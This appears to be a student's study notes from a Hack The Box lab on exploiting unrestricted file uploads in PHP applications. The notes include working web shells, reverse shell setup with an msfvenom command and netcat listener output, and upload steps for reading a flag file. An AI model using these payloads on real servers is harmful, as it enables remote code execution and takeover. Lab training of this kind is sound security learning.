Basic Explotaition

Absent Validation

When the web application does not have any form of validation filters on the uploaded files, allowing the upload of any file type by default.

Arbitrary File Upload

We can drag and drop any file we want, and its name will appear on the upload form, including .php files -->

---

Identifying Web Framework

One easy method to determine what language runs the web application is to visit the /index.ext page, where we would swap out ext with various common web extensions, like php, asp, aspx, among others, to see whether any of them exist.

For example, when we visit our exercise below, we see its URL as http://SERVER_IP:PORT/, as the index page is usually hidden by default. But, if we try visiting http://SERVER_IP:PORT/index.php, we would get the same page, which means that this is indeed a PHP web application

We do not need to do this manually, of course, as we can use a tool like Burp Intruder for fuzzing the file extension using a Web Extensions wordlist, as we will see in upcoming sections.

SecLists/Discovery/Web-Content/web-extensions.txt at master · danielmiessler/SecListsGitHub

---

Vulnerability Identification

As an initial test to identify whether we can upload arbitrary PHP files, let's create a basic Hello World script to test whether we can execute PHP code with our uploaded file.

To do so, we will write <?php echo "Hello HTB";?> to test.php, and try uploading it to the web application:

---

PoCs - Questions

• Try to upload a PHP script that executes the (hostname) command on the back-end server, and submit the first word of it as the answer.

## Create a php file and upload, example: hsh.php
<?php system('hostname'); ?>

---

Upload Exploitation

Web Shells

One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell. Furthermore, SecLists provides a plethora of web shells for different frameworks and languages

Let's try to upload phpbash.php from phpbash to our web application, and then navigate to its link by clicking on the Download button:

Writing Custom Web Shell

For example, with PHP web applications, we can use the system() function that executes system commands and prints their output, and pass it the cmd parameter with $_REQUEST['cmd'], as follows:

<?php system($_REQUEST['cmd']); ?>
## or
<?php system($_GET['cmd']); ?>

---

Reverse Shell

Let's download one of the above reverse shell scripts, like the pentestmonkey, and then open it in a text editor to input our IP and listening PORT, which the script will connect to. For the pentestmonkey script, we can modify lines 49 and 50 and input our machine's IP/PORT:

php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shellGitHub

## In the file chahge this
$ip = 'OUR_IP';     // CHANGE THIS
$port = OUR_PORT;   // CHANGE THIS
## On our machine
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [188.166.173.208] 35232
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

---

Generating Custom Reverse Shell Scripts

Tools like msfvenom can generate a reverse shell script in many languages and may even attempt to bypass certain restrictions in place. We can do so as follows for PHP

eldeim@htb[/htb]$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
...SNIP...
Payload size: 3033 bytes
###########################################
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [181.151.182.286] 56232
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

---

PoCs - Questions

• Try to exploit the upload feature to upload a web shell and get the content of /flag.txt

We can upload a basic REQUEST web shell or a phpbash shell -->

<?php system($_GET['cmd']); ?> ## ws.php
## or
phpbash.php ## Download of github